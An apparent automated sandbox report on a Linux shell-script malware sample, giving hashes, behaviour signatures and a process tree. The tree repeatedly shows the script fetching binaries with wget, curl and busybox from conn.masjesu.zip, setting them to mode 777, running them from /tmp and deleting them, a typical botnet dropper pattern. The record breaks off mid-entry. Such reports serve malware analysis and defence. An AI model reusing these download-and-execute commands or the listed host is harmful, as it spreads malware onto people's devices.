Analysis
-
max time kernel
141s -
max time network
146s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipsel image:debian9-mipsel-20240226-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:32
Static task
static1
Behavioral task
behavioral1
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
-
Size
10KB
-
MD5
993a3e2f46840103a33a0ca2fc91dfe7
-
SHA1
678e29df40375ee97c70526b0218055aed855419
-
SHA256
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870
-
SHA512
0bac561038a79d408e79fa667d6a436f7a5dc10e34ab8cf42f4de8e94b30a60aa6239a43161fdbd33a93e41bb712493f51354ae68939b1648fdff8882868c307
-
SSDEEP
192:SrOVDDYRLNeA59BA77wizvDoVNRN8sDiWFvDoVNv8sDiWO9BA77W6GDDYR4Gh:SrOMNv9BA77TzvDoVNR/vDoVNO9BA77x
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh/tmp/53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh1⤵PID:697
-
/bin/rm/bin/rm bins.sh2⤵PID:701
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵PID:704
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:726
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:728
-
-
/bin/chmodchmod 777 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP./BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:730
-
-
/bin/rmrm BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:731
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- System Network Configuration Discovery
PID:732
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- System Network Configuration Discovery
PID:777
-
-
/bin/chmodchmod 777 V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb./V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Executes dropped EXE
PID:781
-
-
/bin/rmrm V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵PID:783
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- System Network Configuration Discovery
PID:784
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵PID:790
-
-
/bin/chmodchmod 777 TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe./TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵PID:793
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:794
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:797
-
-
/bin/chmodchmod 777 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS./1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵PID:805
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:806
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵PID:828
-
-
/bin/chmodchmod 777 sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa./sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵PID:834
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- System Network Configuration Discovery
PID:836
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- System Network Configuration Discovery
PID:841
-
-
/bin/chmodchmod 777 W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs./W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵PID:844
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:845
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:848
-
-
/bin/chmodchmod 777 RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB./RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG./59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵PID:858
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:859
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- System Network Configuration Discovery
PID:862
-
-
/bin/chmodchmod 777 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb./097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:865
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵PID:866
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- System Network Configuration Discovery
PID:869
-
-
/bin/chmodchmod 777 tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7./tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵PID:872
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:873
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:876
-
-
/bin/chmodchmod 777 e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0./e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:883
-
-
/bin/chmodchmod 777 ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG./ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1./sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- System Network Configuration Discovery
PID:897
-
-
/bin/chmodchmod 777 s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT./s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵PID:900
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:904
-
-
/bin/chmodchmod 777 sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1./sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- System Network Configuration Discovery
PID:911
-
-
/bin/chmodchmod 777 s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT./s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:918
-
-
/bin/chmodchmod 777 e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0./e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:921
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:922
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:925
-
-
/bin/chmodchmod 777 ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG./ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb./V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵PID:935
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵PID:939
-
-
/bin/chmodchmod 777 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP./BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:941
-
-
/bin/rmrm BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- System Network Configuration Discovery
PID:943
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs./W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:950
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:953
-
-
/bin/chmodchmod 777 RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB./RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵PID:956
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- System Network Configuration Discovery
PID:957
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- System Network Configuration Discovery
PID:960
-
-
/bin/chmodchmod 777 TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe./TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵PID:967
-
-
/bin/chmodchmod 777 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS./1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵PID:970
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:971
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:974
-
-
/bin/chmodchmod 777 sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa./sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵PID:977
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- System Network Configuration Discovery
PID:978
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:981
-
-
/bin/chmodchmod 777 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb./097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:984
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- System Network Configuration Discovery
PID:985
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- System Network Configuration Discovery
PID:988
-
-
/bin/chmodchmod 777 tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7./tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵PID:991
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:992
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Reads runtime system information
